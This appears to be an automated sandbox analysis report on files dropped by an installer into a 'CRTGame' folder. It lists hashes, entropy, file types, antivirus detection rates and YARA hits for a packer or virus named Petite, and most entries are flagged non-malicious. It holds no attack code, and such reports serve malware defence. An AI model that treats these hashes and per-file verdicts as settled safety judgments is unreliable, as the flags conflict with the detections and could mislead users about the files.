                                                                        SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                        Malicious:false
                                                                        Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):62478
                                                                        Entropy (8bit):6.063363187934607
                                                                        Encrypted:false
                                                                        SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                        MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                        SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                        SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                        SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11532
                                                                        Entropy (8bit):7.219753259626605
                                                                        Encrypted:false
                                                                        SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                        MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                        SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                        SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                        SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):26126
                                                                        Entropy (8bit):6.048294343792499
                                                                        Encrypted:false
                                                                        SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                        MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                        SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                        SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                        SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):967168
                                                                        Entropy (8bit):6.500850562754145
                                                                        Encrypted:false
                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):227328
                                                                        Entropy (8bit):6.641153481093122
                                                                        Encrypted:false
                                                                        SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                        MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                        SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                        SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                        SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):512014
                                                                        Entropy (8bit):6.566561154468342
                                                                        Encrypted:false
                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):26526
                                                                        Entropy (8bit):4.600837395607617
                                                                        Encrypted:false
                                                                        SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                        MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                        SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                        SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                        SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                        Malicious:false
                                                                        Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):906766
                                                                        Entropy (8bit):6.450201653594769
                                                                        Encrypted:false
                                                                        SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                        MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                        SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                        SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                        SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197646
                                                                        Entropy (8bit):6.1570532273946625
                                                                        Encrypted:false
                                                                        SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                        MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                        SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                        SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                        SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):35588
                                                                        Entropy (8bit):7.817557274117395
                                                                        Encrypted:false
                                                                        SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                        MD5:58521D1AC2C588B85642354F6C0C7812
                                                                        SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                        SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                        SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp, Author: Joe Security
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):149845
                                                                        Entropy (8bit):7.893881970959476
                                                                        Encrypted:false
                                                                        SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                        MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                        SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                        SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                        SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp, Author: Joe Security
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):22542
                                                                        Entropy (8bit):5.5875455203930615
                                                                        Encrypted:false
                                                                        SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                        MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                        SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                        SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
                                                                        SHA-512:A163122DFFE729E6F1CA6EB756A776F6F01A784A488E2ACCE63AEAFA14668E8B1148BE948EB4AF4CA8C5980E85E681960B8A43C94B95DFFC72FCCEE1E170BD9A
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):19008
                                                                        Entropy (8bit):7.672481244971812
                                                                        Encrypted:false
                                                                        SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                        MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                        SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                        SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                        SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):36752
                                                                        Entropy (8bit):7.780431937344781
                                                                        Encrypted:false
                                                                        SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                        MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                        SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                        SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                        SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):31936
                                                                        Entropy (8bit):6.6461204214578
                                                                        Encrypted:false
                                                                        SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                        MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                        SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                        SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                        SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68876
                                                                        Entropy (8bit):7.922125376804506
                                                                        Encrypted:false
                                                                        SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                        MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                        SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                        SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                        SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, Author: Joe Security
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):867854
                                                                        Entropy (8bit):4.9264497464202694
                                                                        Encrypted:false
                                                                        SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                        MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                        SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                        SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                        SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5960
                                                                        Entropy (8bit):5.956401374574174
                                                                        Encrypted:false
                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):43520
                                                                        Entropy (8bit):6.232860260916194
                                                                        Encrypted:false
                                                                        SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                        MD5:B162992412E08888456AE13BA8BD3D90
                                                                        SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                        SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                        SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):34392
                                                                        Entropy (8bit):7.81689943223162
                                                                        Encrypted:false
                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197120
                                                                        Entropy (8bit):6.423554884287906
                                                                        Encrypted:false
                                                                        SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                        MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                        SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                        SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                        SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):123406
                                                                        Entropy (8bit):6.263889638223575
                                                                        Encrypted:false
                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):845312
                                                                        Entropy (8bit):6.581151900686739
                                                                        Encrypted:false
                                                                        SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                        MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                        SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                        SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                        SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):294926
                                                                        Entropy (8bit):6.191604766067493
                                                                        Encrypted:false
                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):115712
                                                                        Entropy (8bit):6.401537154757194
                                                                        Encrypted:false
                                                                        SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                        MD5:840D631DA54C308B23590AD6366EBA77
                                                                        SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                        SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                        SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):127669
                                                                        Entropy (8bit):7.952352167575405
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                        MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                        SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                        SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                        SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, Author: Joe Security
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):7910
                                                                        Entropy (8bit):6.931925007191986
                                                                        Encrypted:false
                                                                        SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                        MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                        SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                        SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                        SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, Author: Joe Security
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):967168
                                                                        Entropy (8bit):6.500850562754145
